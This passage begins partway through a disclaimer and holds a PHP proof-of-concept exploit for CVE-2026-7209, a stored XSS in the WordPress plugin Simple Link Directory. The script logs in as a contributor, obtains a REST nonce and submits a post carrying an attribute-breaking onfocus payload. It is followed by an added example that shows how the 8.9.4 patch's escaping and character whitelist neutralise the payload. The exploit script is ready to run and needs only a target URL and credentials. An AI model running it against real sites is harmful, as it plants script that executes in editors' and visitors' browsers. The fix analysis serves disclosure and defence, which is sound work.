// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-7209 - Simple Link Directory <= 8.9.2 - Stored XSS via Shortcode Attributes

$target_url = 'http://example.com'; // Change to target WordPress site (no trailing slash)
$username   = 'contributor';        // Must have contributor+ role
$password   = 'password';           // Contributor password
$cookie_jar = sys_get_temp_dir() . '/cve-2026-7209-cookies.txt';

// Step 1: Authenticate through wp-login.php.
// wp-login.php rejects the login with "Cookies are blocked" when testcookie=1
// is posted without the wordpress_test_cookie cookie, so send that cookie too.
$ch = curl_init($target_url . '/wp-login.php');
curl_setopt_array($ch, [
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => http_build_query([
        'log'         => $username,
        'pwd'         => $password,
        'wp-submit'   => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie'  => 1,
    ]),
    CURLOPT_COOKIE         => 'wordpress_test_cookie=WP+Cookie+check',
    CURLOPT_COOKIEJAR      => $cookie_jar,
    CURLOPT_COOKIEFILE     => $cookie_jar,
    CURLOPT_RETURNTRANSFER => true,
]);
curl_exec($ch);
$login_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// A successful login answers 302 to redirect_to; a 200 is the login form
// re-rendered with an error message.
if ($login_code !== 302) {
    fwrite(STDERR, "Login failed (HTTP $login_code)\n");
    exit(1);
}

// Step 2: Fetch a REST nonce. Cookie authentication against wp-json requires
// the X-WP-Nonce header (nonce action 'wp_rest'); admin-ajax.php hands out a
// fresh one through the core 'rest-nonce' action.
function get_nonce($url, $cookie_file) {
    $ch = curl_init($url . '/wp-admin/admin-ajax.php?action=rest-nonce');
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $nonce = trim((string) curl_exec($ch));
    curl_close($ch);
    return $nonce;
}

$nonce = get_nonce($target_url, $cookie_jar);
if (!preg_match('/^[0-9a-f]{10}$/', $nonce)) { // WordPress nonces are 10 hex characters
    fwrite(STDERR, "Could not obtain a REST nonce (got: " . substr($nonce, 0, 40) . ")\n");
    exit(1);
}

// Step 3: Create a post carrying the malicious shortcode.
// The attribute is wrapped in single quotes on purpose: shortcode_parse_atts()
// accepts single- or double-quoted values, and with double quotes the value
// would end at the first '"' in the payload, leaving onfocus/autofocus as
// separate, unused shortcode attributes instead of part of title_font_size.
$payload = '45px;" onfocus="alert(1)" autofocus="';

$post_data = [
    'title'   => 'CVE-2026-7209 Test',
    'content' => "[qcopd-directory title_font_size='" . $payload . "']",
    // Contributors lack publish_posts, so 'publish' is refused by the REST API
    // (rest_cannot_publish). Submit for review instead: the payload renders
    // when the author previews the post, when an editor reviews it, and for
    // every visitor once it is approved.
    'status'  => 'pending',
];

$ch = curl_init($target_url . '/wp-json/wp/v2/posts');
curl_setopt_array($ch, [
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => json_encode($post_data),
    CURLOPT_HTTPHEADER     => [
        'Content-Type: application/json',
        'X-WP-Nonce: ' . $nonce,
    ],
    CURLOPT_COOKIEFILE     => $cookie_jar,
    CURLOPT_RETURNTRANSFER => true,
]);
$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

$json = json_decode((string) $response, true);
if ($http_code !== 201 || empty($json['id'])) {
    fwrite(STDERR, "Post creation failed (HTTP $http_code): " . substr((string) $response, 0, 300) . "\n");
    exit(1);
}

$post_id = (int) $json['id'];
echo "Post $post_id created (pending review).\n";
echo "Preview as the author: " . $target_url . "/?p=" . $post_id . "&preview=true\n";
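What each layer of the 8.9.4 fix does to the PoC's payload, as an added example that is neither the plugin's code nor Atomic Edge's PoC: `render_vulnerable()` mirrors the pre-fix behaviour the advisory describes (the attribute value concatenated into a `style` attribute unescaped), `render_escaped()` applies `esc_attr()` alone, and `render_patched()` applies the patch's `preg_replace()` whitelist followed by `esc_attr()`. The `<h3>` markup is a stand-in, since the diff does not show the template line that renders `title_font_size`; when run outside WordPress, `esc_attr()` is approximated with `htmlspecialchars(ENT_QUOTES)`, and the attribute tokenizer is a small regex written for this example, not WordPress's kses parser.

```php
<?php
// Added example: not code from the Simple Link Directory plugin or from the
// Atomic Edge PoC. Shows the effect of each layer of the 8.9.4 fix on the
// CVE-2026-7209 payload. The <h3> markup is a stand-in for the plugin's
// template line, which the published diff does not include.

// Stand-in for WordPress esc_attr() when run outside WordPress: both encode
// & < > " ' for use in a double-quoted attribute value.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Character whitelist copied from the patch hunk in qc-op-directory-shortcodes.php.
function sld_whitelist($value) {
    return preg_replace('/[^a-zA-Z0-9._%-]/', '', (string) $value);
}

// Pre-fix shape described in the advisory: the attribute value is
// concatenated into a style attribute with no escaping.
function render_vulnerable($title_font_size) {
    return '<h3 class="sld-title" style="font-size:' . $title_font_size . '">Title</h3>';
}

// Escaping only: the quote is entity-encoded, so the value can no longer
// close the attribute, but the CSS/HTML syntax of the payload survives as text.
function render_escaped($title_font_size) {
    return '<h3 class="sld-title" style="font-size:' . esc_attr($title_font_size) . '">Title</h3>';
}

// As patched: whitelist first, then esc_attr().
function render_patched($title_font_size) {
    return render_escaped(sld_whitelist($title_font_size));
}

// Split the first tag into attributes the way a browser would: a name with an
// optional double-quoted value. Returns null when the tag is not well formed.
// (Small regex tokenizer written for this example, not a general HTML parser.)
function parse_tag_attributes($html) {
    if (!preg_match('/^<\w+((?:\s+[\w-]+(?:="[^"]*")?)*)\s*>/', $html, $m)) {
        return null;
    }
    preg_match_all('/\s+([\w-]+)(?:="([^"]*)")?/', $m[1], $pairs, PREG_SET_ORDER);
    $attrs = [];
    foreach ($pairs as $p) {
        $attrs[$p[1]] = isset($p[2]) ? $p[2] : '';
    }
    return $attrs;
}

// Names of on* event-handler attributes that ended up on the tag.
function event_handlers($html) {
    $attrs = parse_tag_attributes($html);
    if ($attrs === null) {
        return [];
    }
    return array_values(array_filter(array_keys($attrs), function ($name) {
        return strncasecmp($name, 'on', 2) === 0;
    }));
}

$payload = '45px;" onfocus="alert(1)" autofocus="'; // the advisory's payload

$renderings = [
    'vulnerable' => render_vulnerable($payload),
    'escaped'    => render_escaped($payload),
    'patched'    => render_patched($payload),
];
foreach ($renderings as $label => $html) {
    $attrs = parse_tag_attributes($html);
    printf("%-10s handlers=%s style=%s\n",
        $label,
        json_encode(event_handlers($html)),
        json_encode($attrs === null ? null : $attrs['style']));
}
```

Run it with `php` from the command line. The vulnerable rendering reports an `onfocus` handler on the tag because the payload's `"` closed the `style` attribute; the escaped one keeps the entire payload inside the `style` value as inert text, which is why `esc_attr()` alone already stops the break-out; the patched one reduces the value to `45pxonfocusalert1autofocus`, showing that the whitelist is what strips the CSS and HTML syntax rather than merely encoding it.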
